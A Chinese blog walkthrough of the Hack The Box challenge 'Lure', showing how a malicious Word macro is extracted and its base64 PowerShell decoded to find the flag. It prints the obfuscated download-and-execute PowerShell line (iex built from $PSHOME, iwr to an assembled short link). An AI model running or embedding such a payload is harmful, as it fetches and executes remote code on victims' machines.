hack the box-challenges:Lure题解

最新推荐文章于 2024-09-18 15:55:43 发布

铁锤2号

最新推荐文章于 2024-09-18 15:55:43 发布

阅读量489

点赞数

分类专栏： heck the box 文章标签：安全

本文链接：https://blog.csdn.net/zr1213159840/article/details/124774395

版权

heck the box 专栏收录该内容

34 篇文章 24 订阅

订阅专栏

打开题目，看下题目的要求说了啥，翻译一下就是：财务团队收到了一封看起来很重要的电子邮件，其中包含附加的 Word 文档。你能看一下并确认它是否是恶意的吗？
下载下来文件，一打开，确实是word文档。
在这里插入图片描述
木马，不存在的，我tm直接打开，我就不信了。

好吧，打开确实是word，但是看不到其他内容了。
此时我想到，要不用binwalk看下？

binwalk UegentPayment.doc

在这里插入图片描述
也看不出什么东西，那么咱们直接找别人的教程吧（逃……）
在kali中用libreoffice打开，提示包含macro什么什么的，就是宏，不管，先打开。

接着我们选择tools，macros，edit Macros。

在里面搜啊搜，找啊找，发现了一段似乎是powershell的东西
在这里插入图片描述
捞出来

应该是加密了之类的，我们尝试用base64解密下看看

确实是powershell，放进powershell执行一下

“该脚本尝试向该站点调用 GET 请求，但似乎它不存在……”
所以现在要做的是创建一个名为 test 的变量，并将其分配为 PowerShell 脚本的加密部分，以便以可读的格式查看它。
在这里插入图片描述

pOwErshElL $(-jOiN(($PshOMe[4]),("$PsHoME")[+15],"x");)(iwr $($test=("{5}{25}{8}{7}{0}{14}{3}{21}{2}{22}{15}{16}{31}{28}{11}{26}{17}{23}{27}{29}{10}{1}{6}{24}{30}{18}{13}{19}{12}{9}{20}{4}"-f "B","U","4","B","%7D","ht","R_d","//ow.ly/HT","p:","T","0","_","N","M","%7","E","f","1T","u","e","5","k","R","h","0","t","w","_","l","Y","C","U")))

然后输出一下$test，发现了flag